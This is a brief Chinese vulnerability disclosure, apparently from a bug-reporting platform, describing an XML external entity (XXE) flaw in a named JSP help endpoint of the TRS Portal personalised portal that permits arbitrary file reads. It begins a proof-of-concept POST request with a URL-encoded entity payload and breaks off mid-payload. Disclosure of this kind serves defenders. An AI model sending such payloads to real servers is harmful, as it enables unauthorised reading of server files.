TRS portal个性化门户任意文件读取(二)
简要描述: 发现portal个性化门户其他链接实体注入漏洞 详细说明: TRS Portal个性化门户 http://XX.XX.XX.XX/portal/help/wcmhelpaddeditdowith.jsp链接未对外部实体进行过滤,可调用外部实体进行解析,可任意读取服务器上任意文件 漏洞证明: 漏洞利用过程: http://XX.XX.XX.XX/portal/help/wcmhelpaddeditdowith.jsp POST请求:ObjectXML=%0d%0a%20%20%25remote;%0d%0a%5D%0d%0a...